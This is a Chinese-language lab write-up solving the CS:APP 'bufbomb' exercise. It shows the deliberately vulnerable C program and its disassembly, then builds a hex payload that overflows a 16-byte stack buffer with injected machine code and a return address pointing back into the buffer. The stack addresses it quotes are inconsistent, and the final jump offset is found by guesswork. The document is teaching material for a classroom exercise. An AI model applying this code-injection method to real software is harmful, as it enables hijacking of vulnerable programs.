缓冲区溢出与代码注入

本次的bufbomb实验是让我们根据已有的C语言代码通过缓冲区溢出来达到一些目的，先来看看题目。

/* bufbomb.c
 *
 * Bomb program that is solved using a buffer overflow attack
 *
 * program for CS:APP problem 3.38
 *
 * used for CS 202 HW 8 part 2
 *
 * compile using
 *   gcc -g -O2 -Os -o bufbomb bufbomb.c
 *
 * Your task is to make getbuf return (0xdeadbeef) to test.
 */

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

/* Like gets, except that characters are typed as pairs of hex digits.
   Nondigit characters are ignored.  Stops when encounters newline */
char *getxs(char *dest) {
	int c;
	int even = 1; /* Have read even number of digits */
	int otherd = 0; /* Other hex digit of pair */
	char *sp = dest;
	while ((c = getchar()) != EOF && c != '\n') {
		if (isxdigit(c)) {
			int val;
			if ('0' <= c && c <= '9')
				val = c - '0';
			else if ('A' <= c && c <= 'F')
				val = c - 'A' + 10;
			else
				val = c - 'a' + 10;
			if (even) {
				otherd = val;
				even = 0;
			} else {
				*sp++ = otherd * 16 + val;
				even = 1;
			}
		}
	}
	*sp++ = '\0';
	return dest;
}

int getbuf() {
	char buf[16];
	getxs(buf);
	return 1;
}

void test() {
	int val;
	printf("Type Hex string:");
	val = getbuf();
	printf("getbuf returned 0x%x\n", val);
}

int main() {
	int buf[16];
	/* This little hack is an attempt to get the stack to be in a
	   stable position
	*/
	int offset = (((int) buf) & 0xFFF);
	int *space = (int *) malloc(offset);
	*space = 0; /* So that don't get complaint of unused variable */
	test();
	return 0;
}

题目说得很清楚，我们的目的是让getbuf函数向test函数返回0xdeadbeef。而目前的代码中，无论发生了什么返回的总是1，这需要做一些改变。

首先介绍一下，这个getbufx是在干什么：它是把我们输入的字符串中的单个字符作为十六进制写入到内存。比如输入是dea dbee f，那它就会往缓冲区的前四个字节里分别写入(0x) de ad be ef。

然后来观察getbuf函数的栈结构（高亮部分）：

可以发现buf缓冲区的地址为0x0019FF3C，占16个字节，所以根据函数调用的过程，从0x0019FF4C开始存储的是test函数的栈底，0x0019FF50存放的是getbuf函数的返回地址。

重复一遍，buf+16存的是test函数的栈底，buf+20存的是返回地址。要想改变函数执行流程，我们应该去改返回地址。也就是说，我们应该修改buf+20到buf+23的值为我们需要返回到的地方，执行相应的流程。

再来看看getbuf函数的汇编代码：

Code

48:   int getbuf() {
004011B0   push        ebp
004011B1   mov         ebp,esp
004011B3   sub         esp,50h
004011B6   push        ebx
004011B7   push        esi
004011B8   push        edi
004011B9   lea         edi,[ebp-50h]
004011BC   mov         ecx,14h
004011C1   mov         eax,0CCCCCCCCh
004011C6   rep stos    dword ptr [edi]
49:       char buf[16];
50:       getxs(buf);
004011C8   lea         eax,[ebp-10h]
004011CB   push        eax
004011CC   call        @ILT+0(getxs) (00401005)
004011D1   add         esp,4
51:       return 1;
004011D4   mov         eax,1
52:   }
004011D9   pop         edi
004011DA   pop         esi
004011DB   pop         ebx
004011DC   add         esp,50h
004011DF   cmp         ebp,esp
004011E1   call        __chkesp (00401a10)
004011E6   mov         esp,ebp
004011E8   pop         ebp
004011E9   ret

本来想跳过mov eax, 1这条指令，但是想了想这样是行不通的，首先是堆栈不平衡，然后意义也不大。既然没法跳过，那为什么不能覆盖呢？所以其实可以在ret后做覆盖这件事，也就是执行一条mov eax, 0xdeadbeef，这样就已经可以修改返回值了，接着再想办法回到正常的执行流程。怎么实现这个操作呢？没见过世面的我，想了一个多小时才想到这个操作。

我们可以把返回地址改到缓冲区中，然后在缓冲区中注入代码，执行我们想要的流程！

有了思路，可以试试了，我们要做两件事——给eax赋值并跳转到原来的返回地址。返回到哪呢？通过上面的截图，我们可以知道返回地址应该是在0x0040122A。

Code

1 2	mov eax, 0xdeadbeef jmp 0x0040122A

把这两句汇编代码汇编一下，可以得到十六进制机器码：

B8 EF BE AD DE E9 2A 12 40 00

占了10个字节，接下来缓冲区剩下的6个字节可以用nop，也就是0x90填充。

B8 EF BE AD DE E9 2A 12 40 00 90 90 90 90 90 90

接下来4个字节是test函数原来的ebp，我们不动它，看看上面的堆栈值是0x0019FEA4，照抄下来

B8 EF BE AD DE E9 2A 12 40 00 90 90 90 90 90 90 A4 FE 19 00

接下来4个字节就是返回地址了，我们应该返回到缓冲区的开头0x0019FE3C，才能执行我们的代码

B8 EF BE AD DE E9 2A 12 40 00 90 90 90 90 90 90 A4 FE 19 00 3C FE 19

考虑到getxs函数会往0x19后面写上一个00，所以在填入的时候就把00给省了。
好的，接下来把设计好的值填入到输入流中，会出现一些奇怪的问题。

在执行jmp指令的时候，它跳转到了一个很奇怪的地址0x005A1070，这里没有任何指令，导致机器不知道下一步要做什么。

虽然不知道为什么，但是猜猜解决办法，应该是跟偏移有关，所以我们用这个地址减去0x0040122A，得到一个偏移值0x0019FE46，感觉像是栈上的某个地址。我们不管它，把0x0040122A减去这个偏移量，得到0x002613E4，应该把这个作为jmp的操作数。
重新写一下是这样

B8 EF BE AD DE E9 E4 13 26 00 90 90 90 90 90 90 A4 FE 19 00 3C FE 19

成功了耶~